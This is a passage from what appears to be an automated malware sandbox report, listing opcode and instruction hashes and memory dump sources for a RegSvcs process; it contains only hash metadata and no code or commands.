                                                                  • Opcode Fuzzy Hash: a1c72f7fe2771f2a1881cef25ad7881337247e5e2f4da47d6cf587aa8cd4322b
                                                                  • Instruction Fuzzy Hash: 36415C319093069ED712EF69CC80A6BB7E9EF84B54F400A2EF984D7250E731DE458B97
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                  • Instruction ID: bf247d6b0ba6658be822223839bfdd9409484900b032a1c1c80d97437c165a2b
                                                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                  • Instruction Fuzzy Hash: BB416C31A01211DBDB11EE9C8C887BABBB2EB50759F15836BEE419B341D7329D42CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0095ad03df5137420204efd6e224e824d0b9222f108d3071df999732833ea5eb
                                                                  • Instruction ID: a95b652f895e533275dd99afeafeab08ed1af13a5f86e1ad1e314df76d0030a7
                                                                  • Opcode Fuzzy Hash: 0095ad03df5137420204efd6e224e824d0b9222f108d3071df999732833ea5eb
                                                                  • Instruction Fuzzy Hash: B1417971A41601EFDB21CF18CC40B26BBE9FF54714F60862EE8598B352E775E942CB94
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0208e17e9a32721fa5e31180883b3b3b76cf0c89a24a4ea8ec3441b8ed548cc6
                                                                  • Instruction ID: cc699f52d318e63a2c7fc16c90430d041054f1003839c4c6dcbbe72426bd0f73
                                                                  • Opcode Fuzzy Hash: 0208e17e9a32721fa5e31180883b3b3b76cf0c89a24a4ea8ec3441b8ed548cc6
                                                                  • Instruction Fuzzy Hash: 453158B15412119BDB21AF58CC44B7877B9AF40314F54C2ADE9868B382EB349C82CF90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                  • Instruction ID: 5eea16c85a274b70bf6307b06f030837bae53975e7beff00cdd55b44c1a47637
                                                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                  • Instruction Fuzzy Hash: 00210836601652A7CB16ABD98D04ABAFFB5EF50610F40801EFB958B691F734D940C760
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b26c45b7bf4e69606441a16eafc8e009a3a1729ed18788813130172a766aabba
                                                                  • Instruction ID: 4e42421971fa59e27d4fa459cb97f4e3caf5b9fae2b3bbe840e4de86fc193e5a
                                                                  • Opcode Fuzzy Hash: b26c45b7bf4e69606441a16eafc8e009a3a1729ed18788813130172a766aabba
                                                                  • Instruction Fuzzy Hash: CC313B31A4112C9BDB31EF18CC41FEEB7BAEB15740F0002A5E649A7290D7759E81CFA1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                  • Instruction ID: c9959ccd7fd9d25e4a701badf25918ba3cdcf3408384e9875a3f00edee81184d
                                                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                  • Instruction Fuzzy Hash: 38217131A00619EBCB15CF59C990A9EBBB5FF48B14F10806DEE159B246DA71EE05CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ab95709e3af113b339e796bb359e95d40c1cc7ef93082939dbc8269260ce48c
                                                                  • Instruction ID: c0a43500d2c71f5752db48db0ad3e908e5691b6bef70d9a84000603c7109517a
                                                                  • Opcode Fuzzy Hash: 3ab95709e3af113b339e796bb359e95d40c1cc7ef93082939dbc8269260ce48c
                                                                  • Instruction Fuzzy Hash: 1221A0726087459BC722CF58CC90B6BB7E5FB98B60F41451DFD549B641DB30E901CBA2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                  • Instruction ID: 628f8a27a1459e9bd9ff9840c378c3a4d7723f5fe5af7e455e6c6abcaa863744
                                                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                  • Instruction Fuzzy Hash: 56316931601605EFD721EBA8CD84F6AB7FAEF85354F1046A9E5568B390E770EE02CB50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d3954e7f621cbb1605fb87de732d8a913c535eca49b8bbcb9731ad7778b88281
                                                                  • Instruction ID: 819967a86910058745461f8beceecec9e4a39ed24164e890b3a6a3eb71e9bd8b
                                                                  • Opcode Fuzzy Hash: d3954e7f621cbb1605fb87de732d8a913c535eca49b8bbcb9731ad7778b88281
                                                                  • Instruction Fuzzy Hash: D5317C75A00205EFCB15CF18D884DAEB7F6EF84304B154869F80A9B391EB71EA50CB94
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dc8c2647b09c915291a7689bdfa14f59c548547136ce817a09de60a6579aab02
                                                                  • Instruction ID: 028856c687a185d23c38509196bcb3cfa8ed3cfc582e100abb0678e8648f0b65
                                                                  • Opcode Fuzzy Hash: dc8c2647b09c915291a7689bdfa14f59c548547136ce817a09de60a6579aab02
                                                                  • Instruction Fuzzy Hash: 0B218D71900229ABCF20DF59C881ABEB7F9FF48740B544069F941AB254D738AD42CFA4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 83a05e97432ad945eab7b251209f0ef02d3f3c3bdf76c6f31238812e62c478b4
                                                                  • Instruction ID: 6bdef2be784caf37ab97fcb0f2be16b162b65f01e9680ac3d2e4b3bbc7c394ea
                                                                  • Opcode Fuzzy Hash: 83a05e97432ad945eab7b251209f0ef02d3f3c3bdf76c6f31238812e62c478b4
                                                                  • Instruction Fuzzy Hash: A521AB71A00605AFD715DBACCD44E6AB7A8FF58740F144069F904DB790E638ED40CBA8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30ef6831be93e00ae53971ce801ba1fb2e840dcf1583fb055f33fd4d4f70662d
                                                                  • Instruction ID: db6fcdb20313fbfa71582d192b8aed2451f15d7490b1948e6f71ce6004d4ca27
                                                                  • Opcode Fuzzy Hash: 30ef6831be93e00ae53971ce801ba1fb2e840dcf1583fb055f33fd4d4f70662d
                                                                  • Instruction Fuzzy Hash: E821AF729042469FD711EF5DCD44BABFBECAF90640F08445AB980C7255D734D984C6A2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f52878b0430a3fdabc9c4c93eda99c7efb83b464add22cac9fee4eb7a50d4c7
                                                                  • Instruction ID: 5020eb08e5669fa316ddc73d6f5ae43652144714da5f226e8a6c383553fbdfad
                                                                  • Opcode Fuzzy Hash: 4f52878b0430a3fdabc9c4c93eda99c7efb83b464add22cac9fee4eb7a50d4c7
                                                                  • Instruction Fuzzy Hash: 45214932704681DBE32267AC8D54B647BC5AF01B70F2903ACFB259B7E2D768D8428340
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be545d391cd6980448f7c3b62aaaf9452008fc6b8c8604a4180837919b17c7cd
                                                                  • Instruction ID: 85118338c11956d5a71a9ae65e9915ce3e7c0144e0a704521cedab7d5d54a373
                                                                  • Opcode Fuzzy Hash: be545d391cd6980448f7c3b62aaaf9452008fc6b8c8604a4180837919b17c7cd
                                                                  • Instruction Fuzzy Hash: 36219875240A01AFC725DF69CC10B56B7E6FF08B04F24846CA50ACBB62E371E842CF98
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2bea2690339461d7070086d055d96cc366593b97004f91b4f2fe3944abf623c0
                                                                  • Instruction ID: 961fba833e647425735447df34a6a8d8c635e4c77f7ec0423203f1ad2371954a
                                                                  • Opcode Fuzzy Hash: 2bea2690339461d7070086d055d96cc366593b97004f91b4f2fe3944abf623c0
                                                                  • Instruction Fuzzy Hash: A71106727C0B11BFE72256699C11F2BF69EDBD4B60F210428B71ACB290EB60DC0187D5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f9742e99fb388ed85bcaef94e831b40e49131202756907767469b86f96520e74
                                                                  • Instruction ID: 194b2a43e11ace7b120b2cf30ea7966138aa2b76e3ddbd98f0a3b54f9c687ec9
                                                                  • Opcode Fuzzy Hash: f9742e99fb388ed85bcaef94e831b40e49131202756907767469b86f96520e74
                                                                  • Instruction Fuzzy Hash: 5521E6B1E40349AFCB20DFAAD8949AEFBF9FF98710F10012FE505A7254DA709941CB64
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                  • Instruction ID: 783601764f234e744b51b44ecacf1919edcb613c5b882bf8960ccae96db11069
                                                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                  • Instruction Fuzzy Hash: 16216A72A00219AFDB129F98CC40BAEBBFAEF98310F244459F901A7291E735DD529B50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                  • Instruction ID: 1b4a3c2c069b719caa9da40cc205b272892a0c594a8c43e18eecb2fda09ee65f
                                                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                  • Instruction Fuzzy Hash: 2911EF77601605FFE722AF89CC41FAABBB9EB80B55F10402DF6008B280D671ED44CB64
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b3fd0d4aeef23eca1eee303032d452fc976ea3cd45ee216861b33667c5f42396
                                                                  • Instruction ID: ff55d255cc7bb719d86021e8c5f15cfeb7c13b60fd3970217f7a8adc5ad9cca2
                                                                  • Opcode Fuzzy Hash: b3fd0d4aeef23eca1eee303032d452fc976ea3cd45ee216861b33667c5f42396
                                                                  • Instruction Fuzzy Hash: 3E119D717016199B9F11CF4DC980ABEBBEDAF4B710B19806EEE089F305D7B2D9018790
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                  • Instruction ID: ecf457421285e405beae3cb70ce47cb5c8191faa287a1a1d7bde287e51286832
                                                                  • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                  • Instruction Fuzzy Hash: 3D217972600A49DFD7268F89C940A76FBE6EB94F10F14883DE54A87710E730EC01CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4110f416dff0989dac5d0aa5af2942d56b6c6a06772882a6c909c06b629383a2
                                                                  • Instruction ID: 8e713551f6914ed5ccb8bb3129fc536c57a444239d4c74967f607741d085a7b2
                                                                  • Opcode Fuzzy Hash: 4110f416dff0989dac5d0aa5af2942d56b6c6a06772882a6c909c06b629383a2
                                                                  • Instruction Fuzzy Hash: C6218E75A4020ADFCB14CF98C981AAEBBF9FB89319F24416DD105AB311CB71AD06CBD0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5adb4f8771e1d9ee7f5d87fd8ced58c3498e43da53b37a30b99e2190157946a6
                                                                  • Instruction ID: 1725cbc9fa8ab2ea696240e3bd80a88d7430b9944053e0be8885f625e50bf63d
                                                                  • Opcode Fuzzy Hash: 5adb4f8771e1d9ee7f5d87fd8ced58c3498e43da53b37a30b99e2190157946a6
                                                                  • Instruction Fuzzy Hash: 5D216A71601A01EFD7208F68CC80B76B7E9FF44A50F40882DE6AAC7751EB70E841CB68
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5ec2f00d5ae4d2659511678bd1ad03e5d465adaa92bc1506f3ae4ff3325c0024
                                                                  • Instruction ID: 8b3de230552fe8410fa4027866d607f3646227f0a9d0ba7fe25bd5ba5e06366d
                                                                  • Opcode Fuzzy Hash: 5ec2f00d5ae4d2659511678bd1ad03e5d465adaa92bc1506f3ae4ff3325c0024
                                                                  • Instruction Fuzzy Hash: 1A119172380524EFC722DB59CD40F9AB7A9EB55760F11406AFA45DB251DA70E902CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86bb464ce5c261f61e94b1226a4b1330bcab2e552576b67480e2a3631a457652
                                                                  • Instruction ID: 2ff03d67c2db291b9a7ab8785d5d446f39d8ec4b0b0c180d8a356ea8a206bd20
                                                                  • Opcode Fuzzy Hash: 86bb464ce5c261f61e94b1226a4b1330bcab2e552576b67480e2a3631a457652
                                                                  • Instruction Fuzzy Hash: 5A11E533204114ABCB19EA29CC95AABB357EBD5270B25453DEA228B391EA319846C794
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a9888cc3c90ff34750e1ea1dbbe6e446c94b00fb933a31633e38da49d0761f78
                                                                  • Instruction ID: d415949679beb1fe593e04b5292dc37526f5533d45d37b693c0b36344c70aa79
                                                                  • Opcode Fuzzy Hash: a9888cc3c90ff34750e1ea1dbbe6e446c94b00fb933a31633e38da49d0761f78
                                                                  • Instruction Fuzzy Hash: 9B11BF76A01245EFCB25DF99C980A7ABBE5EF84A10B11847DE9059B311E730DD00CBA8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                  • Instruction ID: 7f4c825bfb5b6c41b9dc6bc2dbeb77bdcb9b297dbbf1003e9b43db5f78646a06
                                                                  • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                  • Instruction Fuzzy Hash: 1B11C436A00915EFDB19CB58CC05B9DFBB5EF84210F058269EC5597344E771AE51CBD0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                  • Instruction ID: 8cf10fa11af1294f5b0b58d28bc0caf19671b534562631a195430525ea97e789
                                                                  • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                  • Instruction Fuzzy Hash: B321F7B5A00B059FD3A0CF29D440B52BBF4FB48720F10492EE98AC7B40E371E814CB94
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                  • Instruction ID: f498b720369686f437a5397849b74dd1f84f37e8aa97b1c8530a917bd34b5307
                                                                  • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                  • Instruction Fuzzy Hash: A3119E32640601EFEB229F4CC844B5AFBA6EF45754F05942CEE099B168DF31DC40DB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d5612d8ad01adb9094c414cc21d4527b5a7c069bfecaaf05912946d65443d7d
                                                                  • Instruction ID: aa63daf0e0dbc26a5d0e19d801dac56d4c030160d421d81e179dcaff459378fe
                                                                  • Opcode Fuzzy Hash: 0d5612d8ad01adb9094c414cc21d4527b5a7c069bfecaaf05912946d65443d7d
                                                                  • Instruction Fuzzy Hash: 67012672205645ABE316A2ADDC98F67BBCDEF40790F0600ACFA048B390DA14EC41C3A1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 498831adefaaed5ad7b7786b93c891e46103f0d306939abb0df31f9418d48773
                                                                  • Instruction ID: 0ca87a40bbc136e8125a3ebe37c79a0263933620dd63caeffb326ec187a902ca
                                                                  • Opcode Fuzzy Hash: 498831adefaaed5ad7b7786b93c891e46103f0d306939abb0df31f9418d48773
                                                                  • Instruction Fuzzy Hash: 8011C236250649AFDF25CF59DE40F6A7BADEB8A764F004119F9058B350CB71E802CF60
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ef11284340381366b97e9150d440f15457090516f45b90ea5fc83d96a59ab6d
                                                                  • Instruction ID: 65eacba73d66392761c880824c881f38db1c48aa642b8ffe7b4089849c158f38
                                                                  • Opcode Fuzzy Hash: 6ef11284340381366b97e9150d440f15457090516f45b90ea5fc83d96a59ab6d
                                                                  • Instruction Fuzzy Hash: 4011C2362006119FD7229A69DC44F6BF7AAFFC4710F194429EE4B87694DA30A806CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d82fcb6eede2aedd014a980fe87d2866e589ec06a9f732d68baf3644c0fff0f
                                                                  • Instruction ID: dfd4d3cfca0beb771ceed7fa7034c2bf2539cad51971d9b45aa6784a1660e1bb
                                                                  • Opcode Fuzzy Hash: 2d82fcb6eede2aedd014a980fe87d2866e589ec06a9f732d68baf3644c0fff0f
                                                                  • Instruction Fuzzy Hash: B2118672900625ABDB21DF5ACD80B6EFBB9EF44B50F54045DDA05A7301D730AD018B59
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3fc03e5b6edd619ce943fc780ebca0e264d2e02823275d629034b6d3958722a
                                                                  • Instruction ID: f606884e6bf584d4f8503d93d847c28bfe8b9ea4e8e9b3010cca743b317a8973
                                                                  • Opcode Fuzzy Hash: a3fc03e5b6edd619ce943fc780ebca0e264d2e02823275d629034b6d3958722a
                                                                  • Instruction Fuzzy Hash: DF01D27550010A9FC725DF19D884F96BBFEEB81324F21816EE4058B361C7709C82CF94
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                  • Instruction ID: 3c2b3bd92874419077f986ecf88118b858d7710e3c848f358836287e6d36c105
                                                                  • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                  • Instruction Fuzzy Hash: 07118E732016C2DBE722976C8D94BA57B94AB41758F1900E8EF419B792F72AC882C760
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
